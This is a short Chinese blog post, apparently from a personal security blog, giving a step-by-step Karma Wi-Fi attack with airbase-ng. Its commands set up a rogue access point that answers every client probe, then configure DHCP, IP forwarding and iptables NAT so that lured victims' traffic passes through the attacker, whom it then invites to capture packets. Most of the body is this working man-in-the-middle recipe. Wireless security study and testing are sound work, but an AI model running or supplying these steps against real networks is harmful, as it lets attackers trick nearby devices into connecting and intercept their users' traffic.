airbase-ng实现Karma攻击 1 min read
本文最后更新于 485 天前,其中的信息可能已经有所发展或是发生改变。

Author:颖奇L’Amore

Blog:www.gem-love.com


前言

我写这篇文章,只是想介绍一下使用airbase-ng进行karma攻击的方法。这也是以前写的文章然后存本地了,单纯介绍操作而已,没有介绍什么原理方法,也没什么技术含量。只是这方面文章较少,发出来和各位大佬交流学习。

关于更多的Karma相关原理或者通过WiFi Pineapple进行攻击实现,可以参考Freebuf一篇非常好的文章:

https://www.freebuf.com/articles/77055.html

 

Karma是什么

Karma是一种通过伪造虚假响应包(Probe Response)来回应STA(Wireless station,手机、平板等客户端等)探测(Probe Request)的攻击方式,让客户端误认为范围内存在曾经连接过的WiFi热点,从而骗取客户端的连接。(本段文字来源于互联网)

 

实施Karma攻击

首先加载进网卡,进入监听模式

airmon-ng start wlan0

由于Karma攻击需要回应Probe Request,这里就需要使用airbase-ng工具

airbase-ng -P -C 30 -v wlan2mon

看一下这两个参数的介绍:

-P               : respond to all probes, even when specifying ESSIDs

-C seconds       : enables beaconing of probed ESSID values (requires -P)

接下来,由于airbase-ng创建了at0接口,我们需要手工使能at0,并且配置IP地址、路由

ifconfig at0 up

ifconfig at0 192.168.1.1 netmask 255.255.255.0

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

(换了个kali,因为是以前写的文章,不记得为啥要换kali了)

接下来就是配置dhcp客户端,我用的kali是老版本,使用dhcpd,现在都已经是isc-dhcp-server,不再使用dhcpd了,大同小异。

关于dhcpserver,不同版本的linux可能会遇到不同的问题,Google一下解决方法就好。

然后设置转发

echo 1 > /proc/sys/net/ipv4/ip_forward

马上就有人上钩了

但是我们连上之后发现,其实是并没有网络连接,甚至ping不通

所以需要设置iptable

iptables —flush

iptables —table nat —flush

iptables —delete-chain

iptables —table nat —delete-chain

iptables -P FORWARD ACCEPT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

现在就可以正常上网了

现在的情况本质是:我们通过Soft AP方法创建了热点,被攻击者连接上了。

接下来,就由攻击者自由发挥了,比如抓包

颖奇L'Amore原创文章,转载请注明作者和文章链接

本文链接地址:https://www.gem-love.com/wlan/422.html

注:本站定期更新图片链接,转载后务必将图片本地化,否则图片会无法显示

暂无评论

发送评论 编辑评论

上一篇
下一篇